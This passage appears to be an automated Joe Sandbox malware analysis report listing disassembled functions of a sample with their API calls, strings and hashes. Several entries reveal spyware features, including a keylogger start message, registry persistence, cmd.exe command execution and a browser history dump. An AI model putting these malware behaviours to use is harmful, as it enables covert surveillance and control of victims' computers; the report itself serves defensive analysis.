                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 00443527
                                                          • _free.LIBCMT ref: 0044353A
                                                          • _free.LIBCMT ref: 0044354B
                                                          • _free.LIBCMT ref: 0044355C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 5455ce8706e3ca66a7bad791c73c4693f29d9b457f563819123ce72749b06e66
                                                          • Instruction ID: bf08c2b723e6da78e2f9a692d3f9dcffc94df7bb1312aea5ebb3a1bf48e2a6b8
                                                          • Opcode Fuzzy Hash: 5455ce8706e3ca66a7bad791c73c4693f29d9b457f563819123ce72749b06e66
                                                          • Instruction Fuzzy Hash: 4EF0FEB08011219FD726AF69BE414063BA0F709764346113BF45E66B71E7790982EB8E
                                                          Function 00416937 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0041694E
                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00416980
                                                          • IsWindowVisible.USER32(?), ref: 00416987
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                          • String ID: 0VG
                                                          • API String ID: 3142014140-3748860515
                                                          • Opcode ID: 8040e70f99a29c17371243be5b0374263071332b934c14761d81ab03223ac4bc
                                                          • Instruction ID: a92d2c2722018a5f2df8734f3a85bf91d45912e01cb50305def5a483f7f9536a
                                                          • Opcode Fuzzy Hash: 8040e70f99a29c17371243be5b0374263071332b934c14761d81ab03223ac4bc
                                                          • Instruction Fuzzy Hash: FE71C3311082415AC335FB61D8A5ADFB3E4EFD4308F50493EB58A530E1EF74AA49CB9A
                                                          Function 0044D669 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044D6B8
                                                          • _free.LIBCMT ref: 0044D7D5
                                                            • Part of subcall function 0043AA64: IsProcessorFeaturePresent.KERNEL32(00000017,0043AA36,00000000,0000000A,0000000A,00000000,0041AF72,00000022,?,?,0043AA43,00000000,00000000,00000000,00000000,00000000), ref: 0043AA66
                                                            • Part of subcall function 0043AA64: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043AA88
                                                            • Part of subcall function 0043AA64: TerminateProcess.KERNEL32(00000000), ref: 0043AA8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: a944b580e8880c8e130e00bdfc146e92b9e44dab990486ab21efc68c0a65a633
                                                          • Instruction ID: 04f9c45711fae47bd805a28d6c684d852fff3551aaaea8338e0504d4b1d9eb7e
                                                          • Opcode Fuzzy Hash: a944b580e8880c8e130e00bdfc146e92b9e44dab990486ab21efc68c0a65a633
                                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFA9C881AAEBBB5EF58314F25416FE854E7301E6399E01CB54
                                                          Function 004428E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000104), ref: 00442924
                                                          • _free.LIBCMT ref: 004429EF
                                                          • _free.LIBCMT ref: 004429F9
                                                          Strings
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 0044291B, 00442922, 00442951, 00442989
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                          • API String ID: 2506810119-148211918
                                                          • Opcode ID: e43589620df6d0a02bbe9fe69612e96b807286bf84d647a6e2c91bfdc5f7fdb4
                                                          • Instruction ID: 08a660f2d8e46f51ee0862092f41265a48d7a3eaa7bec75f040af8368b354bfd
                                                          • Opcode Fuzzy Hash: e43589620df6d0a02bbe9fe69612e96b807286bf84d647a6e2c91bfdc5f7fdb4
                                                          • Instruction Fuzzy Hash: E53193B1A00258AFEB21DF999E8199EBBBCEB85314F50406BF805A7311D6F84A41CB59
                                                          Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • WaitForSingleObject.KERNEL32(00000310,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                          • SetEvent.KERNEL32(00000310,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitsend
                                                          • String ID: {NAL
                                                          • API String ID: 3963590051-1903569844
                                                          • Opcode ID: 438a4a486c613dad8f91b4ef8ef70ced317a48407eae681756782b40dc658345
                                                          • Instruction ID: 09920f02ef31e30e393b68ef0c8285e211ae926702cc5adcda46913b737bad1c
                                                          • Opcode Fuzzy Hash: 438a4a486c613dad8f91b4ef8ef70ced317a48407eae681756782b40dc658345
                                                          • Instruction Fuzzy Hash: 552137B29005156BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EE78A504C6E4
                                                          Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                            • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00466324), ref: 004178B2
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32($cF,?,?,00403AB9,00466324), ref: 004178BB
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • Sleep.KERNEL32(000000FA,00466324), ref: 00403AFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                          • API String ID: 368326130-3219657780
                                                          • Opcode ID: b9ea6b50cec41ec040a9f76ae8369c1ad19d6b37305134aedebb5ccf8f56233d
                                                          • Instruction ID: 03df4c4d2d4284c33795d9a7a6d048d6c9d09091ba23d5cef523323604a75e49
                                                          • Opcode Fuzzy Hash: b9ea6b50cec41ec040a9f76ae8369c1ad19d6b37305134aedebb5ccf8f56233d
                                                          • Instruction Fuzzy Hash: 88319531A0011456CB14FB76DC969EE7779AF80318F00007FF906B31D2EF385A4AC699
                                                          Function 0044837A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 004483ED
                                                          • _free.LIBCMT ref: 00448443
                                                            • Part of subcall function 0044821F: _free.LIBCMT ref: 00448277
                                                            • Part of subcall function 0044821F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E478), ref: 00448289
                                                            • Part of subcall function 0044821F: WideCharToMultiByte.KERNEL32(00000000,00000000,0047279C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448301
                                                            • Part of subcall function 0044821F: WideCharToMultiByte.KERNEL32(00000000,00000000,004727F0,000000FF,?,0000003F,00000000,?), ref: 0044832E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID: xE
                                                          • API String ID: 314583886-407097786
                                                          • Opcode ID: 9c637a4c831fe7eeac3cdc02b43c82e31c030d80d9709743783fb0f8cc9b1dbe
                                                          • Instruction ID: 75d3a8e9ed6c4df3bbb87a82b1f0f54536a25ed198edf9988c125f258b025633
                                                          • Opcode Fuzzy Hash: 9c637a4c831fe7eeac3cdc02b43c82e31c030d80d9709743783fb0f8cc9b1dbe
                                                          • Instruction Fuzzy Hash: 90213B3280013957F730A7259C46DEF7378DB41724F1102AFEC98A2191EF784DC189AD
                                                          Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                          • wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                          • API String ID: 1497725170-1359877963
                                                          • Opcode ID: 2c1e205bf1f5052a51d4638fd4dd379fe1f7b993f8f7852f87f4d6bf88a020b2
                                                          • Instruction ID: eacaba0d290b76b22f399a57737f65b18f8a023abca8575ba11697f47f6457b1
                                                          • Opcode Fuzzy Hash: 2c1e205bf1f5052a51d4638fd4dd379fe1f7b993f8f7852f87f4d6bf88a020b2
                                                          • Instruction Fuzzy Hash: F1115172500118AACB18FB96EC56CFF77B8AE48715B00013FF542621D1EF7C5A86C6E9
                                                          Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                          • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: e51d8b7f57c875fd14822fa47be4c1fb55d37c331493fca39a38941afd0278ea
                                                          • Instruction ID: 13545b77b67cc4507d33d8d8c8ff512a749ba16b8a43449315e0da64450a8124
                                                          • Opcode Fuzzy Hash: e51d8b7f57c875fd14822fa47be4c1fb55d37c331493fca39a38941afd0278ea
                                                          • Instruction Fuzzy Hash: E80161A1A003193AE62076768C86DBF7A6DCA813A8F41043EF541662C3EA7D5D5582FA
                                                          Function 0044AC83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,00000000,8@,?,0044ABA1,8@,0046ED38,0000000C), ref: 0044ACD9
                                                          • GetLastError.KERNEL32(?,0044ABA1,8@,0046ED38,0000000C), ref: 0044ACE3
                                                          • __dosmaperr.LIBCMT ref: 0044AD0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID: 8@
                                                          • API String ID: 2583163307-819625340
                                                          • Opcode ID: f11388ad4d481d826d75519938a9a20661ac3afaecb278e3b0e3570ed3326013
                                                          • Instruction ID: 727ae4bd5dc399200e14d16721253afac520870d53d00e52bc8525c117eb1139
                                                          • Opcode Fuzzy Hash: f11388ad4d481d826d75519938a9a20661ac3afaecb278e3b0e3570ed3326013
                                                          • Instruction Fuzzy Hash: 6F018836640A100BF3212634688573F67498B91B39F29022FF804872D2CE2D8CC1919F
                                                          Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                          • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                          • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: c54170f10c28a2d70f0f06c2367e9daa17625b27f18bd79627845602b5625e1d
                                                          • Instruction ID: 3c9b6871d48b6b3111a672927d5bafc1cfd46058a166b60e959a8cf6be3f516d
                                                          • Opcode Fuzzy Hash: c54170f10c28a2d70f0f06c2367e9daa17625b27f18bd79627845602b5625e1d
                                                          • Instruction Fuzzy Hash: 1601F5B1900B41AFD325BB3A8C4255ABFE4AB45315740053FE293A2BA2DE38E440CB5E
                                                          Function 0041284C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752F0), ref: 00412857
                                                          • RegSetValueExW.ADVAPI32(004752F0,?,00000000,00000001,00000000,00000000,00475308,?,0040E6A3,pth_unenc,004752F0), ref: 00412885
                                                          • RegCloseKey.ADVAPI32(004752F0,?,0040E6A3,pth_unenc,004752F0), ref: 00412890
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: b3a4cd364a4f7c7358af441d7ba84bfe6998b6fc3540b8922562f2b11cb0be87
                                                          • Instruction ID: ab464752906d06cf6e422ab9fb9c42b8cedad3247386a7cb387aa37f92243dc4
                                                          • Opcode Fuzzy Hash: b3a4cd364a4f7c7358af441d7ba84bfe6998b6fc3540b8922562f2b11cb0be87
                                                          • Instruction Fuzzy Hash: 2DF09071500218BBDF50AFA0EE46FEE376CEF40B55F10452AF902B60A1EF75DA08DA94
                                                          Function 0040CE91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CE9C
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CEDB
                                                            • Part of subcall function 004349CD: _Yarn.LIBCPMT ref: 004349EC
                                                            • Part of subcall function 004349CD: _Yarn.LIBCPMT ref: 00434A10
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CEFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 010949cb006bc602daa897d098c336462d98aae1940c118575e4f0b09407aa79
                                                          • Instruction ID: d3fe92e39fe1a76843bdcbebe92e6b3b15f8dcb0f99b50ce5c9cc2ba4b618b17
                                                          • Opcode Fuzzy Hash: 010949cb006bc602daa897d098c336462d98aae1940c118575e4f0b09407aa79
                                                          • Instruction Fuzzy Hash: FEF03171004214AAC768FB62D853ADE77A4AF14758F504B3FF046224D2AF7CB619C688
                                                          Function 0041534A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041538C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: ee5632475eb46ff15070bdf5b556040dc051f9dd48e26135e6c52f0a98a02d4f
                                                          • Instruction ID: 200bce0b0309f38ec9064e519a9a4578f5a600b3ca3b701a036ea6d1077247ba
                                                          • Opcode Fuzzy Hash: ee5632475eb46ff15070bdf5b556040dc051f9dd48e26135e6c52f0a98a02d4f
                                                          • Instruction Fuzzy Hash: F1E0C0B11043406AC708FB65DC96DBF77AC9A90749F10483FB582621E2EE78A949865E
                                                          Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                          Download Yara Rule
